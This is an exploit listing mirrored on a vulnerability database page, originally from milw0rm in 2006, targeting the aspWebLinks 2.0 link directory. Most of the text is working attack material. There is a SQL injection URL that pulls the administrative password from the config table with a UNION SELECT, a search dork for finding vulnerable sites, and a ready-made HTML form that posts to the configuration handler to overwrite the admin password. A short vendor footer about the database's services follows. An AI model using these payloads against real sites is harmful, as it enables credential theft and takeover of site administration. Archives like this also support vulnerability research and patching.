Vulners
Lucene search
aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit
<!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann
# Dork : aspWebLinks 2.0
SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
-->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1